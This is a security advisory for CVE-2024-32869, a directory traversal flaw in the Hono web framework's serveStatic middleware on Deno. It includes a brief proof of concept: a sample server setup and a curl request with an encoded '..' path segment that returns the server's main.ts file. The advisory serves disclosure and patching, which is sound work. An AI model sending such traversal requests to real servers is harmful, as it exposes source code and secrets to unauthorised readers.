GHSA-3mpf-rcc7-5347

Source

https://github.com/advisories/GHSA-3mpf-rcc7-5347

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-3mpf-rcc7-5347/GHSA-3mpf-rcc7-5347.json

Aliases

• CVE-2024-32869

Published

2024-04-23T16:20:49Z

Modified

2024-04-24T14:26:48Z

Summary

Hono vulnerable to Restricted Directory Traversal in serveStatic with deno

Details

Summary

When using serveStatic with deno, it is possible to directory traverse where main.ts is located.

My environment is configured as per this tutorial https://hono.dev/getting-started/deno

PoC

$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt

source

import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'

const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))

Deno.serve(app.fetch)

request

curl localhost:8000/static/%2e%2e/main.ts

response is content of main.ts

Impact

Unexpected files are retrieved.

References

• https://github.com/honojs/hono/security/advisories/GHSA-3mpf-rcc7-5347
• https://nvd.nist.gov/vuln/detail/CVE-2024-32869
• https://github.com/honojs/hono/commit/92e65fbb6e5e7372650e7690dbd84938432d9e65
• https://github.com/honojs/hono